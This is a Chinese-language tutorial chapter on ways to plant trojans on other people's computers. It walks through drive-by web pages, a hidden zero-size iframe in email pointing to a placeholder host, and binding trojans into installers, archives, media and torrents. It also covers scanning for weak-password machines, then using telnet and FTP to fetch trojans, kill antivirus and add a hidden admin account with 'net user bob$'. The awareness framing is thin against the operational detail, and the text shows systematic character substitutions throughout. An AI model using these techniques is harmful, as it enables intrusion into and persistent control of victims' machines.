***的原理和使用實際上是很簡單的,但問題是咱們如何讓咱們的***可以種植到別人的機器上呢?
要知道若是不能在別人計算機上種植***,那就只能在本身機器上自娛自樂了。接下來我就介紹一些***經常使用的***種植技術,但願你們能經過學習加強防範***的意識,儘可能避免如下的一些問題。
第一招:網頁***製做。
因爲目前上互聯網的人每每都要使用IE這個軟件,因此***們都把不少的經歷投入到了IE的研究上。結果就是IE的漏洞不斷的被爆出。關於漏洞的具體問題,咱們在後面的章節再介紹。這裏咱們提到的就是一種能夠遠程執行的漏洞,簡單的說,就是你看了個人網頁,因爲你的IE有漏洞,就會自動執行我所指定的那個文件,若是這個文件是***,你就慘了。
有人把這種***方式形象的比喻成「網頁掛馬」,再加上跨站技術,弄得如今都人心惶惶的。(用firefox上網,危險小得多)
不過,你們可能也會有疑問:就咱這水平,連個HTML都不會寫,怎麼掛啊?迷糊。這就要感謝網絡上的那些高手了,他們任勞任怨的爲咱們寫了不少漏洞利用程序。好比:老丁網頁***生成器。(你們看到筆記時,可能這個漏洞早就被多數人補上了,不過不要緊,相似漏洞不斷的爆,相似軟件不斷的出,用法差很少)。使用過程以下:
一、準備一個空間
二、配置好馬兒,假設名字爲mm.exe
三、打開老丁,輸入http://你的地址/ma/mm.exe,再點生成網頁。
四、把生成的網頁laoding.htm傳到服務器上,再把mm.exe傳到ma這個子目錄。
這樣,只要有人訪問laoding.htm這個網頁就會中馬啦。
第二招:郵件攜帶
用方法一作好的***傳到空間上之後,就能夠在寫郵件的時候,選擇HTML編輯方式(若是是outlook,新建郵件時點「察看」-「編輯源文件」,foxmail你本身找找看),再加入如下內容,實如今網頁中包含一個框架:
"<iframe src=" [url]http://xxxxx.com/xxxx.htm[/url]" ; width="0" height="0"></iframe>",這招夠陰毒。之前試過這一招,挺好用的。
不過,這一招也有些問題。目前的SMTP在發信時都會把包含這個框架的郵件過濾掉。因此咱們只能本身建立MAIL服務器了。好在Mdaemon很好用,你們安裝配置完在安全菜單中把框架過濾那個勾去掉就好了。用你本身的SMTP發信吧!
第三:在flash文件中捆綁
打開flashMX,新建影片或打開其它影片(.swf),建立一個空白關鍵幀,選擇動做-瀏覽器-雙擊geturl,輸入網頁地址,再點動做-影片控制-中止動做,導出電影文件便可。FLASH沒怎麼用過,這回才知道,原來看flash也要當心啊。
第四:視頻傳播
用realmedia editor,工具-合併事件 事先寫個文本文件,內容是: u 00:5.0 00:8.0 網馬網址,這樣就能夠了。
第五:文件捆綁
不說了,工具太多。把一個正常的文件和***捆綁在一塊兒,在找個圖標掩飾一下就行。但我要說的是:不管如何,捆綁後的擴展名都必定是".exe"。
若是你們沒有工具,也能夠用winrar捆綁。方法是把正常文件和***放在一,記錄兩個文件的名字。而後把兩個文件都選中,右鍵-添加到壓縮文件。再選中「建立自解壓文件」。而後在「高級」-「自解壓選項」中,寫好壓縮前運行的文件(正常文件),寫好壓縮後運行文件(***),再選靜默模式中的所有隱藏就好了。
第六:經過MS較新的軟件安裝包MSI也能夠捆綁***
一、取得正常安裝後的文件,最好使用軟件的綠色版,把全部文件和***文件放在同一個目錄。
二、使用advance installer,到霏凡能夠找到crack版。新建工程,選擇專業版-新建工程嚮導,點擊下一步、瀏覽選擇準備好的目錄。
三、有快捷方式的選擇地方,把軟件包中的主程序勾選,軟件語言據實填寫。
四、最後一步,絕對不要選:如今建立。這樣就會進入下一步,軟件的主程序界面。
五、選「文件或文件夾」,點開「windows volume」,新建一個system32,再把***拽過去,這樣MSI安裝完成後,***會自動放在這個目錄中。
六、選「註冊表」,在HKCU-software-microsoft-windows-current version-run中加載提到的***文件便可。(固然,若是系統中安裝有瑞星這樣能夠監控系統註冊表的軟件,安裝到此步時會出現提示。)
七、若是***支持服務啓動,也能夠在服務-安裝服務上點右鍵-新建服務初始化,
八、在左側菜單選「自定義操做」,在安裝執行順序下的install上右鍵,選新建安裝的自定義操做,選中***文件,選「異步執行,不等待返回」,這樣能夠避免安裝出現延遲,在執行選項中選確認(毫不能選當即執行)。
九、F7生成工程文件便可。
第七:配合掃描工具
本例可使用流光,也可使用傻瓜IPC掃描器。
一、用流光掃描有IPC漏洞的計算機(就是設置了弱密碼計算機)
二、掃描完成後,點工具菜單-IPC工具-種植者
找到配置好的***文件-再選中***種植的路徑-出現提示「指定的程序將在**秒後執行」
三、等待肉雞上線便可。
注:本實驗成功機率較小,2003 2000等系統爲防止有人加自動運行程序,做了保護。若是目標主機上有殺軟,也會殺掉***。若是目標主機沒有隱含共享,也沒有其它共享目錄,則更沒法實現。
第八:手工開telnet種植
一、最簡單就是用阿D工具包,找到其中的肉雞掃描,找到弱密碼的肉雞後,點:打開telnet服務。
二、把查看進行和刪除進行的兩個程序:pslist.exe pskill.exe 以及***文件上傳到一個FTP服務器。
三、telnet x.x.x.x "telnet鏈接目標主機
經過ftp鏈接到放了好多***軟件的服務器。ftp y.y.y.y
mget * "下載全部文件
pslist 查看全部進程
pskill 殺掉殺毒軟件進程
若是殺毒軟件實現關不掉(許多殺軟有進程保護機制),就只好作咱們最不忍心的事兒了(刪除殺毒軟件的全部文件,再重啓他的機器)
四、執行***
五、留下後門,你們能夠用如下的方法,但最好仍是克隆一個管理員賬號,若是不會,就baidu一下,網上不少說明。
net user bob$ /add
net localgroup administrators bob$ /add
提示:若是關閉了ipc$共享,或對方計算機密碼沒法破解,此辦法無效。另外,針對於不是空密碼的簡單密碼,能夠考慮在掃描工具中配合事先生成的字典。
第九:BT捆綁
一、掌握一個最新最受歡迎的電影,用如下方法之一進行捆綁
文件捆綁器:缺點易被發現擴展名的問題。
文件欺騙法:製作N個EXE文件,有的綁***,有的不綁。
二、用bt軟件生成種子
三、到網站推介種子,未來下的人越多,中馬的人越多。
第十:蜜罐種植法
在計算機上開一個guest可訪問的共享,裏邊放一些捆綁了***的文件,而後就等着一些小鳥進洞吧!!!
以上提到的方法還遠沒有把***種馬的技術說徹底(筆者水平也就這樣兒了),因此***們的欺騙手段真的是防不勝防。因此,你們必定要擦亮眼睛。中個馬沒關係,但做爲一名IT專業人士,咱可丟不起那人啊。
好了,這一章就到這裏,敬請關注連載。